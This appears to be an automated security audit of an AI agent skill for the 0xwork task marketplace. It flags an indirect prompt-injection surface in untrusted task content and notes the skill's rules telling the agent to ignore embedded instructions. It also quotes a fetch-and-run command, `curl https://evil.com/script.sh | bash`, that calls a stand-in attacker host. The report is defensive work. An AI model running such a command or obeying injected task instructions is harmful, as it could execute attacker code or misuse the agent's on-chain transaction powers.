0xwork
Fail
Audited by Gen Agent Trust Hub on Apr 1, 2026
Risk Level: HIGH
PROMPT_INJECTION, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- [PROMPT_INJECTION]: The skill processes untrusted user-generated marketplace content, creating a surface for indirect prompt injection.
  - Ingestion points: Task data retrieved via `0xwork discover` and `0xwork task <id>` in `SKILL.md`, and external web content fetched for research tasks.
  - Boundary markers: The skill includes a dedicated 'Security: Untrusted Content Handling' section with non-negotiable rules for the agent to treat task content as data and ignore any instructions found within it.
  - Capability inventory: The agent can perform on-chain transactions (staking, claiming, submitting deliverables) via the CLI and potentially execute code if equipped with developer tools.
  - Sanitization: Relies on prompt-level instructions and defensive guidance to prevent the agent from acting on malicious instructions embedded in task descriptions.
- [REMOTE_CODE_EXECUTION]: Found the pattern `curl https://evil.com/script.sh | bash` in `SKILL.md`. This is explicitly documented as an example of a malicious attack that the agent should avoid, rather than an instruction to be followed.
- [COMMAND_EXECUTION]: The skill uses `npm install` and `npx` to manage the `@0xwork/cli` tool and involves file system interactions for managing task deliverables and `.env` configuration files.
- [EXTERNAL_DOWNLOADS]: The skill installs software from the npm registry and encourages the use of web search tools to download and process external information for research tasks.
Recommendations
- HIGH: Downloads and executes remote code from: https://evil.com/script.sh - DO NOT USE without thorough review
Audit Metadata